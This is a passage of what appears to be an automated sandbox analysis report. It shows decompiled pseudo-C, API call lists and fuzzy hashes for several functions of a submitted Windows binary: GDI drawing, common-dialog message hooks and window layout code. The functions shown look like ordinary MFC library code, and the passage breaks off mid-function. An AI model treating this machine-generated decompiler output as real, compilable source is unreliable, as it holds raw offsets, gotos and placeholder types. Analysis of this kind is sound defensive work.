                  0x0040e94e
                  0x0040e955
                  0x0040e95c
                  0x0040e966
                  0x0040e8b4
                  0x0040e8b6
                  0x0040e8bb
                  0x0040e8c6
                  0x0040e8cf
                  0x0040e8cf
                  0x0040e8c6
                  0x0040e8d1
                  0x0040e8da
                  0x0040e91b
                  0x0040e92a
                  0x0040e937
                  0x0040e8dc
                  0x0040e8dc
                  0x0040e8e3
                  0x0040e8e5
                  0x0040e8e5
                  0x0040e8f5
                  0x0040e908
                  0x0040e912
                  0x0040e912
                  0x0040e8da
                  0x0040e975
                  0x0040e97a
                  0x0040e97f
                  0x0040e983
                  0x0040e986
                  0x0040e98d
                  0x0040e997
                  0x0040e99f
                  0x0040e9a7
                  0x0040e9ae
                  0x0040e9b3
                  0x0040e9bb
                  0x0040e9bb
                  0x0040e9c1
                  0x0040e9c3
                  0x0040e9c3
                  0x0040e9ce
                  0x0040e9d6
                  0x0040e9d6
                  0x0040e9dc
                  0x0040e9de
                  0x0040e9de
                  0x0040e9f6

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040E868
                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0040E88B
                  • GetWindowRect.USER32 ref: 0040E8A5
                  • GetWindowLongA.USER32 ref: 0040E8BB
                  • CopyRect.USER32 ref: 0040E908
                  • CopyRect.USER32 ref: 0040E912
                  • GetWindowRect.USER32 ref: 0040E91B
                  • CopyRect.USER32 ref: 0040E937
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                  • String ID: (
                  • API String ID: 808654186-3887548279
                  • Opcode ID: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction ID: ae4a21a952a57d180e51b079893b1d30c26c389abd653013c1f1d069e54050a6
                  • Opcode Fuzzy Hash: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction Fuzzy Hash: 24514F72900219ABDB00DFAADD85EEEBBB9BF48314F154526F905F3290DB34E9118B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C904, Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 345COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041C904(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t172;
				long _t176;
				long _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				struct HBRUSH__* _t237;
				intOrPtr* _t242;
				intOrPtr _t247;
				signed int* _t274;
				intOrPtr* _t293;
				intOrPtr* _t296;
				intOrPtr _t329;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t345;
				signed int _t347;
				intOrPtr* _t353;
				intOrPtr _t358;
				int _t361;
				intOrPtr* _t362;
				int _t363;
				void* _t365;

				_push(0x78);
				_t172 = E00431A9B(E0044BA35, __ebx, __edi, __esi);
				_t296 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x8c)) == 0 ||  *((intOrPtr*)(__ecx + 0x98)) == 0) {
					L27:
					return E00431B73(_t172);
				} else {
					_t353 =  *((intOrPtr*)(_t365 + 8));
					E0041B41D(_t353, _t365 - 0x2c);
					 *((intOrPtr*)(_t365 - 0x38)) = 0;
					 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
					 *(_t365 - 4) = 0;
					_t176 = GetSysColor(6);
					_t8 = _t365 - 0x3c; // 0x452f3c
					E0041B3F9(_t8, 0, 2, _t176);
					 *(_t365 - 0x30) =  *(_t365 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
					 *(_t365 - 4) = 1;
					_t178 = GetSysColor(0x10);
					_t358 = 0;
					_t13 = _t365 - 0x34; // 0x452f3c
					E0041B3F9(_t13, 0, 3, _t178);
					 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x10)) = 1;
					 *((intOrPtr*)(_t365 - 0x10)) = 0;
					if( *((intOrPtr*)(_t296 + 0x118)) <= 0) {
						L26:
						_t162 = _t365 - 0x3c; // 0x452f3c
						E004230B1(_t162);
						_t163 = _t365 - 0x34; // 0x452f3c
						E004230B1(_t163);
						_t164 = _t365 - 0x34; // 0x452f3c
						 *(_t365 - 4) = 0;
						 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
						E0040ADD4(_t296, _t164, _t353, 0x452f3c, _t383);
						 *(_t365 - 4) =  *(_t365 - 4) | 0xffffffff;
						_t169 = _t365 - 0x3c; // 0x452f3c
						 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
						_t172 = E0040ADD4(_t296, _t169, _t353, 0x452f3c,  *(_t365 - 4));
						goto L27;
					} else {
						 *(_t365 - 0x14) =  *(_t365 - 0x14) & 0;
						goto L5;
						L12:
						 *(_t365 - 0x1c) = GetDeviceCaps(( *(_t296 + 0x90))[2], 0xa);
						SetRect( *((intOrPtr*)(_t296 + 0x134)) + 0x24, 0, 0, GetDeviceCaps(( *(_t296 + 0x90))[2], 8),  *(_t365 - 0x1c));
						E0041A5C8( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)) + 0x24);
						 *((intOrPtr*)( *_t353 + 0x1c))();
						_t361 =  *((intOrPtr*)(_t296 + 0xb0)) +  *(_t365 - 0x14);
						 *(_t365 - 0x1c) = _t361;
						if( *((intOrPtr*)(_t361 + 0x18)) == 0) {
							 *((intOrPtr*)( *_t296 + 0x194))( *((intOrPtr*)(_t365 - 0x10)));
							if( *((intOrPtr*)(_t296 + 0x10c)) != 0) {
								_t274 = E0041954D(_t296, _t365 - 0x44);
								 *(_t365 - 0x2c) =  ~( *_t274);
								 *(_t365 - 0x28) =  ~(_t274[1]);
								if( *((intOrPtr*)(_t296 + 0x80)) != 0) {
									GetClientRect( *(_t296 + 0x20), _t365 - 0x84);
									_t343 =  *((intOrPtr*)(_t296 + 0x68));
									if(_t343 <  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84)) {
										asm("cdq");
										 *(_t365 - 0x2c) =  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84) - _t343 - _t347 >> 1;
									}
									_t344 =  *((intOrPtr*)(_t296 + 0x6c));
									if(_t344 <  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80))) {
										asm("cdq");
										 *(_t365 - 0x28) =  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80)) - _t344 - _t347 >> 1;
									}
								}
							}
						}
						 *((intOrPtr*)( *_t353 + 0x34))(1);
						E004192C7(_t353, _t365 - 0x4c,  *(_t365 - 0x2c),  *(_t365 - 0x28));
						E00422AAE(_t353, _t365 - 0x54, 0, 0);
						 *((intOrPtr*)( *_t353 + 0x24))(5);
						_t83 = _t365 - 0x3c; // 0x452f3c
						E00423194(_t353, _t83);
						E0041B443(_t353, _t361);
						_t84 = _t365 - 0x34; // 0x452f3c
						E00423194(_t353, _t84);
						E00422BBC(_t353, _t365 - 0x5c,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 4)) + 3);
						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						E00422BBC(_t353, _t365 - 0x64,  *_t361 + 3,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t365 - 0x74) =  *(_t365 - 0x74) + 1;
						 *((intOrPtr*)(_t365 - 0x70)) =  *((intOrPtr*)(_t365 - 0x70)) + 1;
						 *((intOrPtr*)(_t365 - 0x6c)) =  *((intOrPtr*)(_t365 - 0x6c)) - 2;
						 *((intOrPtr*)(_t365 - 0x68)) =  *((intOrPtr*)(_t365 - 0x68)) - 2;
						_t237 = GetStockObject(0);
						_t362 =  *((intOrPtr*)(_t365 + 8));
						FillRect( *(_t362 + 4), _t365 - 0x74, _t237);
						 *((intOrPtr*)( *_t362 + 0x20))(0xffffffff);
						_t242 =  *((intOrPtr*)(_t296 + 0x134));
						_t353 =  *((intOrPtr*)(_t365 - 0x10));
						if( *((intOrPtr*)(_t242 + 0x10)) == 0) {
							L23:
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
							__eflags = _t353;
							if(_t353 == 0) {
								_t247 =  *((intOrPtr*)(_t296 + 0x114));
								__eflags = _t247 - 1;
								if(_t247 > 1) {
									__eflags = _t247 - 1;
									E0041BAC8(_t296, _t247 - 1, 1);
								}
							}
							goto L26;
						} else {
							_t329 =  *((intOrPtr*)(_t296 + 0x114));
							if(_t329 + _t353 > ( *( *((intOrPtr*)( *_t242 + 0x74)) + 0x1e) & 0x0000ffff)) {
								goto L23;
							}
							_t353 = _t353 + 1;
							 *((intOrPtr*)( *_t296 + 0x198))(_t329, _t353);
							_t363 =  *(_t365 - 0x1c);
							E0042DC27( *(_t296 + 0x90),  *((intOrPtr*)(_t363 + 0x18)),  *((intOrPtr*)(_t363 + 0x1c)));
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x74))(0xd, 0, 0, _t365 - 0x24);
							E0042D602( *(_t296 + 0x90), _t365 - 0x24);
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *_t363;
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *((intOrPtr*)(_t363 + 4));
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) + 1;
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *(_t365 - 0x2c);
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) + 1;
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *(_t365 - 0x28);
							E0042D9B9( *(_t296 + 0x90),  *((intOrPtr*)(_t365 - 0x24)),  *((intOrPtr*)(_t365 - 0x20)));
							E0042DB24( *(_t296 + 0x90));
							 *((intOrPtr*)( *( *(_t296 + 0x8c)) + 0x180))( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)));
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
							 *(_t365 - 0x14) =  *(_t365 - 0x14) + 0x28;
							 *((intOrPtr*)(_t365 - 0x10)) = _t353;
							_t383 = _t353 -  *((intOrPtr*)(_t296 + 0x118));
							if(_t353 <  *((intOrPtr*)(_t296 + 0x118))) {
								_t353 =  *((intOrPtr*)(_t365 + 8));
								_t358 =  *((intOrPtr*)(_t365 - 0x10));
								L5:
								 *((intOrPtr*)(_t365 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x1c))();
								if(_t353 != 0) {
									_t186 =  *((intOrPtr*)(_t353 + 4));
								} else {
									_t186 = 0;
								}
								_t347 =  *( *(_t296 + 0x90));
								 *((intOrPtr*)(_t347 + 0x10))(_t186);
								 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x14)) =  *((intOrPtr*)(_t296 + 0x114)) + _t358;
								_t190 =  *((intOrPtr*)(_t296 + 0x114));
								if(_t190 + _t358 >= _t190) {
									_t345 = _t190 + _t358;
									if(_t345 >= _t358) {
										_t293 =  *((intOrPtr*)(_t296 + 0x134));
										_t347 =  *( *((intOrPtr*)( *_t293 + 0x74)) + 0x1e) & 0x0000ffff;
										if(_t345 <= _t347) {
											_t347 =  *( *(_t296 + 0x8c));
											 *((intOrPtr*)(_t347 + 0x160))( *(_t296 + 0x90), _t293);
										}
									}
								}
								goto L12;
							} else {
								goto L26;
							}
						}
					}
				}
			}

























                  0x0041c904
                  0x0041c90b
                  0x0041c910
                  0x0041c91a
                  0x0041cd40
                  0x0041cd45
                  0x0041c92c
                  0x0041c92c
                  0x0041c935
                  0x0041c93a
                  0x0041c93d
                  0x0041c944
                  0x0041c94f
                  0x0041c956
                  0x0041c959
                  0x0041c95e
                  0x0041c962
                  0x0041c96b
                  0x0041c96f
                  0x0041c974
                  0x0041c977
                  0x0041c97a
                  0x0041c985
                  0x0041c98c
                  0x0041c995
                  0x0041cd0d
                  0x0041cd0d
                  0x0041cd10
                  0x0041cd15
                  0x0041cd18
                  0x0041cd22
                  0x0041cd25
                  0x0041cd29
                  0x0041cd2c
                  0x0041cd31
                  0x0041cd35
                  0x0041cd38
                  0x0041cd3b
                  0x00000000
                  0x0041c99b
                  0x0041c99b
                  0x0041c99e
                  0x0041ca18
                  0x0041ca2b
                  0x0041ca4d
                  0x0041ca63
                  0x0041ca6c
                  0x0041ca78
                  0x0041ca7f
                  0x0041ca82
                  0x0041ca8f
                  0x0041ca9c
                  0x0041caa4
                  0x0041cab9
                  0x0041cabc
                  0x0041cabf
                  0x0041cacb
                  0x0041cada
                  0x0041cadf
                  0x0041caec
                  0x0041caf1
                  0x0041caf1
                  0x0041cafa
                  0x0041caff
                  0x0041cb09
                  0x0041cb0e
                  0x0041cb0e
                  0x0041caff
                  0x0041cabf
                  0x0041ca9c
                  0x0041cb17
                  0x0041cb26
                  0x0041cb35
                  0x0041cb40
                  0x0041cb43
                  0x0041cb49
                  0x0041cb51
                  0x0041cb56
                  0x0041cb5c
                  0x0041cb73
                  0x0041cb84
                  0x0041cb9a
                  0x0041cbab
                  0x0041cbb3
                  0x0041cbb4
                  0x0041cbb5
                  0x0041cbb6
                  0x0041cbb7
                  0x0041cbba
                  0x0041cbbd
                  0x0041cbc1
                  0x0041cbc7
                  0x0041cbd2
                  0x0041cbd8
                  0x0041cbe4
                  0x0041cbe7
                  0x0041cbf1
                  0x0041cbf4
                  0x0041ccda
                  0x0041cce2
                  0x0041ccf0
                  0x0041ccf3
                  0x0041ccf5
                  0x0041ccf7
                  0x0041ccfd
                  0x0041cd00
                  0x0041cd04
                  0x0041cd08
                  0x0041cd08
                  0x0041cd00
                  0x00000000
                  0x0041cbfa
                  0x0041cbff
                  0x0041cc0e
                  0x00000000
                  0x00000000
                  0x0041cc16
                  0x0041cc1b
                  0x0041cc21
                  0x0041cc30
                  0x0041cc47
                  0x0041cc54
                  0x0041cc5e
                  0x0041cc61
                  0x0041cc64
                  0x0041cc6a
                  0x0041cc70
                  0x0041cc73
                  0x0041cc82
                  0x0041cc8d
                  0x0041cca6
                  0x0041ccb4
                  0x0041ccc2
                  0x0041ccc5
                  0x0041ccc9
                  0x0041cccc
                  0x0041ccd2
                  0x0041c9a0
                  0x0041c9a3
                  0x0041c9a6
                  0x0041c9b1
                  0x0041c9b6
                  0x0041c9bc
                  0x0041c9b8
                  0x0041c9b8
                  0x0041c9b8
                  0x0041c9c5
                  0x0041c9c8
                  0x0041c9d9
                  0x0041c9dc
                  0x0041c9e7
                  0x0041c9e9
                  0x0041c9ee
                  0x0041c9f0
                  0x0041c9fb
                  0x0041ca01
                  0x0041ca09
                  0x0041ca12
                  0x0041ca12
                  0x0041ca01
                  0x0041c9ee
                  0x00000000
                  0x0041ccd8
                  0x00000000
                  0x0041ccd8
                  0x0041ccd2
                  0x0041cbf4
                  0x0041c995

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C90B
                    • Part of subcall function 0041B41D: GetViewportOrgEx.GDI32(?,?), ref: 0041B42B
                  • GetSysColor.USER32(00000006), ref: 0041C94F
                    • Part of subcall function 0041B3F9: CreatePen.GDI32(?,?,?), ref: 0041B40A
                  • GetSysColor.USER32(00000010), ref: 0041C96F
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0041CA29
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0041CA39
                  • SetRect.USER32 ref: 0041CA4D
                  • GetClientRect.USER32 ref: 0041CACB
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422ACF
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422AE2
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B443: Rectangle.GDI32(?,?,?,?,?), ref: 0041B459
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BDD
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BF0
                    • Part of subcall function 004226D4: MoveToEx.GDI32(?,?,?,00000000), ref: 004226F1
                    • Part of subcall function 004226D4: LineTo.GDI32(?,?,?), ref: 00422700
                  • GetStockObject.GDI32(00000000), ref: 0041CBC7
                  • FillRect.USER32 ref: 0041CBD8
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042DB24: SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                    • Part of subcall function 0042DB24: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                    • Part of subcall function 0042DB24: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                    • Part of subcall function 0042DB24: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceRectWindow$MoveObjectViewport$ColorSelect$ClientClipCreateFillH_prolog3IntersectLineModeRectangleStock
                  • String ID: ($</E$</E$</E
                  • API String ID: 4163831729-2541786092
                  • Opcode ID: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction ID: 4748042c30c6ea2c037a8edb363e0c25ba98aba555b109a0587ae0009503a143
                  • Opcode Fuzzy Hash: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction Fuzzy Hash: 99E13A71A002199FCB05DFA8D985FEDB7B6FF48304F1440AAE919AB256CB34A941CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042A570, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 129registryclipboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0042A570(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x406452);
					_t54 = 0x466508;
					_t68 = E00420AEC(__ebx, 0x466508, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E00406436(__ebx, 0x466508, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E0040EE68(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							E0040FCD3( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x466928; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E0040EE68(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E0041E99D(_t70, 0x454738);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x46691c; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x466920; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x466918; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x466924; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1d4; // 0x1d4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
								goto L26;
							}
							_t40 = E00417298(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						_t54 = 0x40e;
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x466918 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x46691c = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x466920 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x466924 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x466928 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x46692c = _t46;
						_push(_a12);
						_t31 = E00417499(_t52, _t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                  0x0042a570
                  0x0042a57b
                  0x0042a584
                  0x0042a585
                  0x0042a58a
                  0x0042a594
                  0x0042a596
                  0x0042a598
                  0x0042a59a
                  0x0042a59a
                  0x0042a59f
                  0x0042a5a2
                  0x0042a5ac
                  0x0042a5ae
                  0x0042a5b3
                  0x0042a5b6
                  0x0042a5bb
                  0x0042a5bb
                  0x0042a5ae
                  0x0042a5be
                  0x0042a5bf
                  0x0042a5c7
                  0x0042a5c9
                  0x0042a632
                  0x0042a638
                  0x0042a6fd
                  0x0042a708
                  0x0042a710
                  0x0042a710
                  0x00000000
                  0x0042a710
                  0x0042a63e
                  0x0042a640
                  0x0042a651
                  0x0042a651
                  0x0042a657
                  0x0042a6e5
                  0x0042a6e5
                  0x00000000
                  0x0042a6e5
                  0x0042a665
                  0x0042a667
                  0x0042a669
                  0x00000000
                  0x00000000
                  0x0042a672
                  0x0042a677
                  0x0042a679
                  0x0042a68b
                  0x0042a68b
                  0x0042a691
                  0x0042a6a2
                  0x0042a6a8
                  0x0042a6c4
                  0x0042a6ca
                  0x0042a6e9
                  0x0042a6ef
                  0x00000000
                  0x00000000
                  0x0042a6f5
                  0x00000000
                  0x0042a6f5
                  0x0042a6d1
                  0x0042a6d1
                  0x0042a6df
                  0x00000000
                  0x0042a6df
                  0x0042a6ad
                  0x0042a6ad
                  0x0042a6b3
                  0x0042a6b9
                  0x0042a6bf
                  0x00000000
                  0x0042a6bf
                  0x0042a69a
                  0x00000000
                  0x0042a69a
                  0x0042a67d
                  0x0042a682
                  0x0042a689
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a689
                  0x0042a642
                  0x0042a647
                  0x0042a64b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a5cb
                  0x0042a5dd
                  0x0042a5e9
                  0x0042a5f5
                  0x0042a601
                  0x0042a60d
                  0x0042a612
                  0x0042a614
                  0x0042a617
                  0x0042a61c
                  0x0042a623
                  0x0042a711
                  0x00000000
                  0x0042a712
                  0x0042a5c9
                  0x00000000

                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 0042A5D6
                  • RegisterClipboardFormatA.USER32 ref: 0042A5E2
                  • RegisterClipboardFormatA.USER32 ref: 0042A5EE
                  • RegisterClipboardFormatA.USER32 ref: 0042A5FA
                  • RegisterClipboardFormatA.USER32 ref: 0042A606
                  • RegisterClipboardFormatA.USER32 ref: 0042A612
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1228543026-3888057576
                  • Opcode ID: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction ID: b1fb21f4436616dfddf3654ade33f9c9fefc51839f7fc6c1fd550e6eedef1f38
                  • Opcode Fuzzy Hash: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction Fuzzy Hash: A841D270700225EBCF219F21ED88A6E3BA1EB84314B65043BFC415B251D77D88A5CBAF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004099A0, Relevance: 22.7, APIs: 15, Instructions: 200windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004099A0(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t68;
				char _t70;
				int _t72;
				int* _t74;
				int _t77;
				intOrPtr _t85;
				struct HWND__* _t88;
				struct HWND__* _t93;
				struct HMENU__* _t95;
				struct HWND__* _t97;
				int _t104;
				intOrPtr* _t116;
				int* _t119;
				RECT* _t135;
				intOrPtr* _t138;
				signed int _t156;

				_t120 = __ecx;
				_t119 = _a8;
				_t135 = 0;
				_t138 = __ecx;
				_t139 = _t119;
				if(_t119 != 0) {
					L2:
					_t68 =  *((intOrPtr*)( *_t138 + 0x148))();
					_v20 = _t68;
					if(_t68 == _t135) {
						goto L1;
					}
					if(_a4 != _t135) {
						_t116 = _t68 - 0xffffff80;
						if( *_t116 != _t135) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t116)) + 0x5c))(_t135);
						}
					}
					_t70 =  *((intOrPtr*)(_t138 + 0x88));
					_a8 = _t135;
					_v12 = _t70;
					if(_t70 == _t135) {
						L16:
						_t119[2] = _a8;
						if(_a4 == _t135) {
							 *(_t138 + 0xb4) = _t135;
							_t72 = GetDlgItem( *(_t138 + 0x20), 0xea21);
							_a4 = _t72;
							__eflags = _t72;
							if(_t72 != 0) {
								_t88 = GetDlgItem( *(_t138 + 0x20), 0xe900);
								__eflags = _t88;
								if(_t88 != 0) {
									SetWindowLongA(_t88, 0xfffffff4, 0xea21);
								}
								SetWindowLongA(_a4, 0xfffffff4, 0xe900);
							}
							__eflags = _t119[1];
							if(_t119[1] != 0) {
								InvalidateRect( *(_t138 + 0x20), 0, 1);
								_t85 =  *((intOrPtr*)(_t138 + 0xd4));
								__eflags = _t85 - 1;
								if(_t85 != 1) {
									__eflags = _t85 - 2;
									if(_t85 == 2) {
										 *(_t138 + 0xd8) = _t119[1];
									}
								} else {
									SetMenu( *(_t138 + 0x20), _t119[1]);
								}
							}
							_t74 = _v20 - 0xffffff80;
							__eflags =  *_t74;
							if( *_t74 != 0) {
								 *((intOrPtr*)( *( *_t74) + 0x5c))(1);
							}
							 *((intOrPtr*)( *_t138 + 0x150))(1);
							_t77 =  *_t119;
							__eflags = _t77 - 0xe900;
							if(_t77 != 0xe900) {
